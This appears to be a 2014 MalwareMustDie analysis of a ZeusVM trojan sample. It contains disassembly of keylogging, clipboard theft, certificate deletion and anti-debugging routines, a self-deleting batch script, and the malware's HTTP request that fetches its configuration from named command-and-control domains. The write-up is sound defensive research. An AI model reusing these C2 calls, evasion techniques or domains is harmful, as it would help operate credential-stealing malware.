
#MalwareMustDie | ZeusVM w/ 0x02 Signed Sample

MalwareMustDie, May 24th, 2014
// #MalwareMustdie | ZeusVM analysis
// Sample:
// SHA256: 0663c151e7107e6d5378ecba52753f78ad50761ac6e32b63b95172dc840a1225
// File name: tmp2a10246c.exe

// binhex..

// VT already detected with most AV
File ./tmp2a10246c.exe with MD5 95deb733bee27a2897f24f2d1e3618c4
----------------------------------------------------------------
   SHA256:
   0663c151e7107e6d5378ecba52753f78ad50761ac6e32b63b95172dc840a1225
   File name: tmp2a10246c.exe
   Detection ratio: 33 / 52
   Analysis date: 2014-05-23 20:04:36 UTC ( 11 hours, 5 minutes ago )
   First submission 2014-05-23 20:04:36 UTC ( 11 hours, 5 minutes ago )
   Last submission 2014-05-23 20:04:36 UTC ( 11 hours, 5 minutes ago )

Bkav                     : W32.GenericPwsylazT.Trojan
MicroWorld-eScan         : Trojan.GenericKDZ.25005
nProtect                 : Trojan.GenericKDZ.25005
McAfee                   : Downloader-FYH!95DEB733BEE2
Malwarebytes             : Spyware.Zbot.ED
Zillya                   : Trojan.Zbot.Win32.151539
NANO-Antivirus           : Trojan.Win32.PornoAsset.cwapdj
Symantec                 : Trojan.Zbot
ESET-NOD32               : a variant of Win32/Injector.BBFY
TrendMicro-HouseCall     : TROJ_GEN.R0C1C0EDG14
Avast                    : Sf:Zbot-GG [Trj]
Kaspersky                : Trojan-Spy.Win32.Zbot.saoh
BitDefender              : Trojan.GenericKDZ.25005
Agnitum                  : Trojan.Badur!
Ad-Aware                 : Trojan.GenericKDZ.25005
Sophos                   : Troj/HkMain-U
F-Secure                 : Trojan.GenericKDZ.25005
DrWeb                    : Trojan.Winlock.11260
VIPRE                    : Trojan.Win32.Generic!BT
TrendMicro               : TROJ_GEN.R0C1C0EDG14
McAfee-GW-Edition        : Downloader-FYH!95DEB733BEE2
Emsisoft                 : Trojan.GenericKDZ.25005 (B)
Antiy-AVL                : Trojan/Win32.Badur
Microsoft                : VirTool:Win32/CeeInject.gen!KK
SUPERAntiSpyware         : Trojan.Agent/Gen-Zusy
GData                    : Trojan.GenericKDZ.25005
AhnLab-V3                : Trojan/Win32.Ransomlock
VBA32                    : Hoax.PornoAsset
Panda                    : Trj/Zbot.M
Ikarus                   : Trojan.Inject2
Fortinet                 : W32/KRYPTIK.TY!tr
AVG                      : Inject2.YSJ
Baidu-International      : Trojan.Win32.Zbot.aL

// PE header basic information
   Target machine Intel 386 or later processors and compatible processors
   Compilation timestamp 2014-03-30 17:04:35
   Link date 6:04 PM 3/30/2014
   Entry Point 0x00005426
   Number of sections 4

// PE sections (name, virtual address, virtual size, raw size, entropy, MD5)
  .text 4096 19392 20480 6.04 c50bd6f985985237d249564fc757469f
  .rdata 24576 7778 8192 4.56 4d46641fc046f62c6bd32d5420314c38
  .data 32768 768 4096 1.37 d499d4b20e3aaa0f8246be7e242bc1af
  .rsrc 36864 5888 8192 3.76 3af9a03ce363600d40f31e75aa8aa812

// Number of PE resources by language
   CHINESE SIMPLIFIED 17


// ==========================
// TYPICAL ZEUS FUNCTION:
// ==========================

// functionality to read the clipboard data


004144EA        push ebp
004144EB        mov ebp, esp
004144ED        push esi
004144EE        mov esi, dword ptr [ebp+08h]
004144F1        push edi
004144F2        push esi
004144F3        call dword ptr [0040135Ch]      GetClipboardData@USER32.DLL (Import, Unknown Params)
004144F9        mov edi, eax
004144FB        mov dword ptr [ebp+08h], edi
004144FE        call 004203BAh  target: 004203BA
00414503        test al, al
00414505        jne 0041450Eh   target: 0041450E

// and keyboard logger....

00414422        mov edi, eax
00414424        call dword ptr [00401278h]      GetTickCount@KERNEL32.DLL (Import, Unknown Params) xref: 00414420
0041442A        push eax
0041442B        push dword ptr [00428DCCh]
00414431        lea eax, dword ptr [esp+44h]
00414435        push edi

00414476        lea eax, dword ptr [esp+78h]
0041447A        push eax
0041447B        call dword ptr [00401380h]      GetKeyboardState@USER32.DLL (Import, Unknown Params)
00414481        test eax, eax

// downloader....

004168AA        push edi
004168AB        call dword ptr [004013E0h]      InternetQueryDataAvailable@WININET.DLL (Import, Unknown Params)
004168B1        jmp 004168E1h   target: 004168E1
004168B3        push dword ptr [ebp+18h]        xref: 0041689C
004168B6        push dword ptr [ebp+14h]
004168B9        push ebx
004168BA        push edi
004168BB        call dword ptr [004013C8h]      InternetReadFileExW@WININET.DLL (Import, Unknown Params)
004168C1        jmp 004168E1h   target: 004168E1
004168C3        push dword ptr [ebp+18h]        xref: 00416899
004168C6        push dword ptr [ebp+14h]
004168C9        push ebx
004168CA        push edi
004168CB        call dword ptr [004013DCh]      InternetReadFileExA@WININET.DLL (Import, Unknown Params)
004168D1        jmp 004168E1h   target: 004168E1
004168D3        push dword ptr [ebp+10h]        xref: 00416896
004168D6        push dword ptr [ebp+0Ch]
004168D9        push ebx
004168DA        push edi
004168DB        call dword ptr [00401400h]      InternetReadFile@WININET.DLL (Import, Unknown Params)
004168E1        mov dword ptr [ebp-04h], eax    xref: 004168D1 004168C1 004168B1
004168E4        mov eax, dword ptr [ebp-04h]    xref: 0041689F 0041688D
004168E7        pop edi
004168E8        pop esi
004168E9        pop ebx
004168EA        leave
004168EB        retn 0014h      function end

// confusing with google access

in binary and memory: http://www.google.com/webhp

// Backdoor...

Source: C:\tmp2a10246c.exe      Code function: 1_2_0040C257 socket,bind,closesocket,    1_2_0040C257
Source: C:\tmp2a10246c.exe      Code function: 1_2_0040BE70 socket,bind,listen,closesocket,     1_2_0040BE70
Source: C:\tmp2a10246c.exe      Code function: 1_1_0040C257 socket,bind,closesocket,    1_1_0040C257
Source: C:\tmp2a10246c.exe      Code function: 1_1_0040BE70 socket,bind,listen,closesocket,     1_1_0040BE70
Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_2_0040C257 socket,bind,closesocket,    3_2_0040C257
Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_2_0040BE70 socket,bind,listen,closesocket,     3_2_0040BE70
Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_1_0040C257 socket,bind,closesocket,    3_1_0040C257
Source: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe       Code function: 3_1_0040BE70 socket,bind,listen,closesocket,     3_1_0040BE70
Source: C:\WINDOWS\explorer.exe Code function: 4_2_0264C257 socket,bind,#3,     4_2_0264C257
Source: C:\WINDOWS\explorer.exe Code function: 4_2_0264BE70 socket,bind,listen,#3,      4_2_0264BE70

// Self copy:

File created: C:\Documents and Settings\Administrator\Application Data\Kopuud\raqah.exe

// dynamically determine API calls

0041C0BA        mov eax, edi
0041C0BC        push eax
0041C0BD        call dword ptr [004011F8h]      LoadLibraryW@KERNEL32.DLL (Import, Unknown Params)
0041C0C3        mov dword ptr [ebp-30h], eax
0041C0C6        cmp eax, ebx

0041C0D9        mov eax, edi
0041C0DB        push eax
0041C0DC        push dword ptr [ebp-30h]
0041C0DF        call dword ptr [00401290h]      GetProcAddress@KERNEL32.DLL (Import, Unknown Params)
0041C0E5        cmp eax, ebx
0041C0E7        je 0041C2B8h    target: 0041C2B8
0041C0ED        push ebx

0041C2B3        call 0041B441h  target: 0041B441
0041C2B8        push dword ptr [ebp-30h]        xref: 0041C0E7 0041C0FB
0041C2BB        call dword ptr [00401298h]      FreeLibrary@KERNEL32.DLL (Import, Unknown Params)
0041C2C1        pop edi         xref: 0041C0AC 0041C0B4 0041C0C8
0041C2C2        pop esi

// check VM by enumerating the list of files in a dir:

0040E8F6 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,


// sigged.. with unverified.

$ gnusigcheck /MMD/Sigcheck/tmp2a10246c.exe:
        Verified:       n/a
        Link date:      2:04 2014/03/31
        Publisher:      n/a
        Description:    n/a
        Product:        n/a
        Prod version:   n/a
        File version:   n/a
        MachineType:    32-bit
        Binary Version: n/a
        Original Name:  n/a
        Internal Name:  n/a
        Copyright:      n/a
        Comments:       n/a
        Entropy:        7.699
        VT detection:   33/52

// query sig (MS)

00417588        push 00000000h
0041758A        xor bl, bl
0041758C        call dword ptr [00401090h]      CertOpenSystemStoreW@CRYPT32.DLL (Import, Unknown Params)
00417592        mov edi, eax
00417594        test edi, edi
00417596        je 004175CCh    target: 004175CC
00417598        push ebp
00417599        mov ebp, dword ptr [00401088h]  CertEnumCertificatesInStore@CRYPT32.DLL (Import, Unknown Params)
0041759F        push esi
004175A0        push 00000000h
004175A2        jmp 004175B7h   target: 004175B7
004175A4        push esi        xref: 004175BE
004175A5        call dword ptr [00401084h]      CertDuplicateCertificateContext@CRYPT32.DLL (Import, Unknown Params)
004175AB        test eax, eax
004175AD        je 004175B6h    target: 004175B6
004175AF        push eax
004175B0        call dword ptr [00401094h]      CertDeleteCertificateFromStore@CRYPT32.DLL (Import, Unknown Params)
004175B6        push esi        xref: 004175AD
004175B7        push edi        xref: 004175A2
004175B8        call ebp        CertEnumCertificatesInStore@CRYPT32.DLL (Import, Unknown Params)
004175BA        mov esi, eax
004175BC        test esi, esi
004175BE        jne 004175A4h   target: 004175A4
004175C0        push eax
004175C1        push edi
004175C2        mov bl, 01h
004175C4        call dword ptr [0040108Ch]      CertCloseStore@CRYPT32.DLL (Import, Unknown Params)
004175CA        pop esi

// Check Native system,,

0041994F        push edi
00419950        push dword ptr [00429028h]
00419956        call dword ptr [0040127Ch]      WaitForSingleObject@KERNEL32.DLL (Import, Unknown Params)
0041995C        test eax, eax
0041995E        je 004199D8h    target: 004199D8

0041996C        push edi
0041996D        push esi
0041996E        call dword ptr [00428B50h]      ZwQueryInformationProcess@NTDLL.DLL (Import, Hidden, Unknown Params)
00419974        test eax, eax
00419976        js 004199D8h    target: 004199D8

004199EB        push dword ptr [ebp+08h]
004199EE        call dword ptr [00428B48h]      ZwCreateThread@NTDLL.DLL (Import, Hidden, Unknown Params)
004199F4        pop edi
004199F5        pop esi

// system reboot command:

Hook base address: 0420B31 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,Sleep,GetFileAttributesExW,GetFileAttributesExW,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle

// Assembly just too long,, I summarized:

// Malicious activity:

functionality to inject threads in other processes
functionality to launch a program with higher privileges
allocation memory in foreign processes
changes memory attrib in foreign processes to executable or writable
functionality to write to remote processes
Injects a PE file into foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Writes to foreign memory regions
etc...

// Anti-debugging summary (bad news for OllyDbg, Immunity and WinDbg):

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Source: C:\tmp2a10246c.exe      Code function: 1_2_0041C075 LoadLibraryW,GetProcAddress,FreeLibrary,    1_2_0041C075
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates guard pages, often used to prevent reverse engineering and debugging

// ====================
// FULL BEHAVIOR
// yep, I run it w/o problem..coz MMD NEVER use VM..
// ====================

// Overall malware process spawn:
    tmp2a10246c.exe (PID: 1996 MD5: 95DEB733BEE27A2897F24F2D1E3618C4)
        tmp2a10246c.exe (PID: 1644 MD5: 95DEB733BEE27A2897F24F2D1E3618C4)
            raqah.exe (PID: 1556 MD5: 9F2939AED6D92F0BEFF66B02039B9CC4)
                raqah.exe (PID: 1144 MD5: 9F2939AED6D92F0BEFF66B02039B9CC4)
                    explorer.exe (PID: 1564 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)
            cmd.exe (PID: 332 cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp33865f44.bat MD5: 6D778E0F95447E6546553EEEA709D03C)

// Batch installer used:
@echo off
:d
del "C:\tmp2a10246c.exe"
if exist "C:\tmp2a10246c.exe" goto d
del /F "C:\Users\admin\AppData\Local\Temp\tmp86e978e8.bat"

// =====================================
// Config CNC: 56b1af1270e.ru (fakes), tmp71.edns.su (real) port 443 non SSL
        eolambow.com
// =====================================
  domain now is sinkholed by ABUSE.CH 192.42.116.41
  original IP: 173.193.197.194
   sinkholed2:
// headers:
HTTP/1.1 200 OK
X-Sinkhole: Malware sinkhole
Content-Type: text/html
Server: nginx/0.7.65
Date: Sat, 24 May 2014 08:24:41 GMT
Content-Length: 0

// =====================================
// Networking (Zeus config download)
// =====================================

// config:

GET /cfg.jpg HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET4.0C; .NET4.0E)
Host: 56b1af1270e.ru
Cache-Control: no-cache

// callbacks/ dmn searched:  tmp71.edns.su
// Additional configs: (thanks Xylit0l)
https: //tmp71.edns.su/css/logo.jpg
http: //eolambow.com/rvidmppgu/cfg.bin

// Config points from config file (thanks Raashid)

// PoC.. tcpdump, yes, FreeBSD box capture as bridge, outside of the box!!!

No.     Time        Source                Destination           Protocol Length Info
      1 0.000000    x.x.x.x          195.186.1.121         DNS      73     Standard query 0x2395  A tmp71.edns.su

Frame 1: 73 bytes on wire (584 bits), 73 bytes captured (584 bits)
Ethernet II, Src: CadmusCo_20:fd:a9 (08:00:27:20:fd:a9), Dst: 0a:00:27:00:00:00 (0a:00:27:00:00:00)
Internet Protocol Version 4, Src: x.x.x.x (x.x.x.x), Dst: 195.186.1.121 (195.186.1.121)
User Datagram Protocol, Src Port: 64934 (64934), Dst Port: domain (53)
Domain Name System (query)

No.     Time        Source                Destination           Protocol Length Info
      2 0.097632    195.186.1.121         x.x.x.x          DNS      73     Standard query response 0x2395 No such name

Frame 2: 73 bytes on wire (584 bits), 73 bytes captured (584 bits)
Ethernet II, Src: 0a:00:27:00:00:00 (0a:00:27:00:00:00), Dst: CadmusCo_20:fd:a9 (08:00:27:20:fd:a9)
Internet Protocol Version 4, Src: 195.186.1.121 (195.186.1.121), Dst: x.x.x.x (x.x.x.x)
User Datagram Protocol, Src Port: domain (53), Dst Port: 64934 (64934)
Domain Name System (response)

----
#MalwareMustDie | malwaremustdie.org